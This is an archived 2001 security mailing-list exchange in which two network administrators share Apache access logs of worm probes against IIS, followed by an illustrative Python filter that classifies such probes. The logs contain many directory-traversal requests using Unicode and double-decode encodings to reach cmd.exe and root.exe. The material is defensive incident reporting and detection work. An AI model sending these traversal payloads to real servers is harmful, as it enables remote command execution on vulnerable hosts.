Re: CodeBlue finally hitting, or what?

From: Jason Giglio (jgiglioat_private)
Date: Tue Sep 18 2001 - 08:36:35 PDT


    I've gotten 721 hits just today for cmd.exe of some sort.  We run apache so
    no worries, but this worm has hit faster than anything I've seen before.
    
    All from the people that share the same class A as us.  This one must scan
    its own class C then B then A first.  (I know I'm probably abusing the
    terms, but you all know what I mean)
    
    
    65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
    /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
    65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
    /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
    65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
    /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
    65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
    /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
    HTTP/1.0" 404 320
    65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
    /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
    HTTP/1.0" 404 320
    
    On 2001.09.18 10:24 "Portnoy, Gary" wrote:
    > Greetings,
    > 
    > I am suddenly seeing hundreds of Unicode traversal requests coming in
    > from all over the world, many of them from previous CodeRed victims.  I am
    > guessing someone changed CodeBlue to make it spread faster, because
    > before I saw maybe 1 or 2 CodeBlue attempts a day, and so far I've seen
    > at least 20 in the last hour.  Just as a way to help fingerprint it, a
    > few of the attempted exploits use the multiple decode vulnerability....
    > 
    > -Gary-
    > 
    > 12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET
    > /scripts/root.exe?/c+dir
    > HTTP/1.0" 404 287 "-" "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET
    > /MSADC/root.exe?/c+dir
    > HTTP/1.0" 404 285 "-" "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET
    > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET
    > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET
    > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-"
    > "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
    > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
    > HTTP/1.0" 404 326 "-" "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
    > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
    > HTTP/1.0" 404 326 "-" "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
    > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
    > stem32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:51 -0400] "GET
    > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-"
    > "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET
    > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-"
    > "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET
    > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-"
    > "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET
    > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-"
    > "-"
    > 12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET
    > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-"
    > "-"
    > 12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET
    > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-"
    > "-"
    > 12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET
    > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
    > "-"
    > "-"
    > 12.27.232.252 - - [18/Sep/2001:10:17:01 -0400] "GET
    > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-"
    > "-"
    > 
    > Gary Portnoy
    > Network Administrator
    > gportnoyat_private
    > 
    > PGP Fingerprint: 9D69 6A39 642D 78FD 207C  307D B37D E01A 2E89 9D2C
    > 
    > 
    > ----------------------------------------------------------------------------
    > This list is provided by the SecurityFocus ARIS analyzer service.
    > For more information on this free incident handling, management 
    > and tracking system please see: http://aris.securityfocus.com
    > 
    > 
    --
    Jason Giglio
    Information Technology Coordinator, Smyth Companies, Bedford VA
    Phone: 540-586-2311x113
    e-mail: jgiglioat_private
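    A small log filter in the spirit of this thread, added here as an illustration and not code from either poster: it parses Apache-style access log lines (constructed samples modelled on the requests quoted above), flags cmd.exe and root.exe probes, labels which encoding variant each one used (plain path, double-decode %25xx, or overlong UTF-8 %c0/%c1 sequences, the "multiple decode" fingerprint Gary mentions), and reports what share of flagged hits come from the server's own first octet, the pattern Jason observes. The local address 65.1.2.3 is a placeholder.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample in Apache common-log format; request shapes follow the thread.
SAMPLE_LOG = """\
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:51 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
10.0.0.5 - - [18/Sep/2001:10:20:00 -0400] "GET /index.html HTTP/1.0" 200 1043 "-" "-"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})')
OVERLONG_RE = re.compile(r'%c[01]%[0-9a-f]{2}')   # %c0%af, %c1%1c, %c1%9c ...
ENCODED_RE = re.compile(r'%[0-9a-f]{2}')

def classify(path):
    """Return None for a benign path, otherwise the traversal variant it uses."""
    low = path.lower()
    if 'cmd.exe' not in low and 'root.exe' not in low:
        return None
    if OVERLONG_RE.search(low):
        return 'overlong-utf8'          # invalid UTF-8 encodings of '/' or '\'
    # Decode one layer; any %XX left over only works if the server decodes twice.
    if ENCODED_RE.search(unquote(low)):
        return 'double-decode'
    return 'plain'                      # e.g. /c/winnt/... or a root.exe probe

def summarize(log_text):
    """Count flagged requests per source IP and per encoding variant."""
    per_ip, per_variant = Counter(), Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        variant = classify(m.group('path'))
        if variant:
            per_ip[m.group('ip')] += 1
            per_variant[variant] += 1
    return per_ip, per_variant

def same_class_a_share(per_ip, local_ip):
    """Fraction of flagged hits whose source shares the local first octet (/8)."""
    octet = local_ip.split('.')[0]      # local_ip is a placeholder for the server's address
    total = sum(per_ip.values())
    return sum(n for ip, n in per_ip.items() if ip.split('.')[0] == octet) / total if total else 0.0
```

On the sample, the two hits from 65.114.21.16 out of five flagged requests give a 0.4 same-/8 share against a 65.x.x.x server.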
    
    This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 09:45:20 PDT